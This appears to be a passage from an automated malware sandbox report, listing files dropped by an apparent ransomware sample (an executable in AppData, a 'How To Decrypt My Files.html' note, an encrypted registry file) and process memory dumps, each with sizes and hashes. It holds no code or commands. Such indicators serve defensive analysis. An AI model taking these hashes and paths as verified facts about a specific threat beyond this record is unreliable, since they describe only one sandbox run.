2e36dadff720f5f5c8ce9aaa56023722dd41d90c939b743d1a8d5331c62b98cecbec35c9d58477a54552b37e502f65fbf611f45fa3ba9664b97abc1df4caa5c8

Download Submit
C:\Users\Admin\AppData\Roaming\executor_API.exe

Filesize
88KB

MD5
9dd97d4bdc760711bc64d0600e745df8

SHA1
50ce18d5825b03a9fa460a106b2a647c20e5e337

SHA256
2f191f50ed2216698294c9e37ff5253b8ef6b7e5e9c3b7e0d0572c08a1b1b98d

SHA512
ea20c914d6efa7146d8cf00fcf3ad533ee363d8df0ce547c1b016bcb97e35073267bc455c500386d02b02e06b781229cc1c5224711e32202749ecfaa0a41cc56

Download Submit
C:\Users\Admin\Desktop\How To Decrypt My Files.html

Filesize
639B

MD5
d2dbbc3383add4cbd9ba8e1e35872552

SHA1
020abbc821b2fe22c4b2a89d413d382e48770b6f

SHA256
5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be

SHA512
bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

Download Submit
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
c0083e00fccf6e18cc0490444e463a3d

SHA1
d2e20d063392e64ab6b7ef8fa2f7f2ef4e8fec7a

SHA256
8500f9ce39fa2154fb9d6eef76b6e39034f3dcb3a1a167f2213c4bb4440db14b

SHA512
fe2c4bba943b8ba2c0ea5390248bc7c0345a1225cc26cc02ea856844602ffab3d9e9e1689cf4263b9c314179cb5960bc8d2f981a5f67acd3958c23769ea22b84

Download Submit
memory/3348-13-0x0000021E28E90000-0x0000021E28EB2000-memory.dmp

Filesize
136KB

Download
memory/3736-64-0x00007FF9F6D30000-0x00007FF9F6F25000-memory.dmp

Filesize
2.0MB

Download
memory/3736-8-0x00007FF9F6D30000-0x00007FF9F6F25000-memory.dmp

Filesize
2.0MB

Download
memory/3736-67-0x000000001B230000-0x000000001B23C000-memory.dmp

Filesize
48KB

Download
memory/3736-378-0x000000001BE80000-0x000000001BE88000-memory.dmp

Filesize
32KB

Download
memory/3736-63-0x00007FF9F6D30000-0x00007FF9F6F25000-memory.dmp

Filesize
2.0MB

Download
memory/3736-12-0x00007FF9F6D30000-0x00007FF9F6F25000-memory.dmp

Filesize
2.0MB

Download
memory/3736-69-0x0000000000CF0000-0x0000000000CFC000-memory.dmp

Filesize
48KB

Download
memory/3736-363-0x000000001B420000-0x000000001B42A000-memory.dmp

Filesize
40KB

Download
memory/3736-9-0x0000000000520000-0x000000000053C000-memory.dmp

Filesize
112KB

Download
memory/4796-10-0x00007FF9F6D30000-0x00007FF9F6F25000-memory.dmp

Filesize
2.0MB

Download
memory/4796-11-0x0000000008070000-0x000000000807A000-memory.dmp

Filesize
40KB

Download
memory/4796-7-0x0000000008260000-0x0000000008474000-memory.dmp

Filesize
2.1MB

Download
memory/4796-3-0x00000000053D0000-0x0000000005462000-memory.dmp

Filesize
584KB

Download
memory/4796-2-0x0000000005A70000-0x0000000006014000-memory.dmp

Filesize
5.6MB

Download
memory/4796-0-0x00007FF9F6D30000-0x00007FF9F6F25000-memory.dmp

Filesize
2.0MB

Download
memory/4796-1-0x00000000009D0000-0x00000000009E8000-memory.dmp

Filesize
96KB

Download